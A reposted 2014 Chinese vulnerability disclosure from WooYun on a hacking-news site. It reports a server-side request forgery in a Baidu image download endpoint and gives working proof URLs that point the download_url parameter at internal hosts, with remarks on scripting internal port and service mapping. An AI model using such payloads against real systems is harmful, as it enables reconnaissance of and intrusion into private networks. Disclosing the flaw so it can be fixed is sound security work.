记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

内网编织者百度各业务内网来回编织

2014-10-08 14:40

漏洞地址:http://app.image.baidu.com/photos/LOGIC/webapp/download.php?download_url=

漏洞证明:

http://app.image.baidu.com/photos/LOGIC/webapp/download.php?download_url=http://10.42.7.78

91.jpg





本来百度内网隔离就不严格,这里的话,其实可以写脚本批量跑了。。。



虽然此漏洞只能探测非200返回页面,但是可以摸清百度内网大部分web服务器开放端口、web程序类型等信息。。。 危害依然很大啦。。



如果再配合一些poc。。



再上一张内网系统截图

http://app.image.baidu.com/photos/LOGIC/webapp/download.php?download_url=http://hack.baidu.com/

98.jpg





好了。。 点到为止。。

修复方案:

·fix it

知识来源: www.wooyun.org/bugs/wooyun-2014-073636

阅读:78463 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“内网编织者百度各业务内网来回编织”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云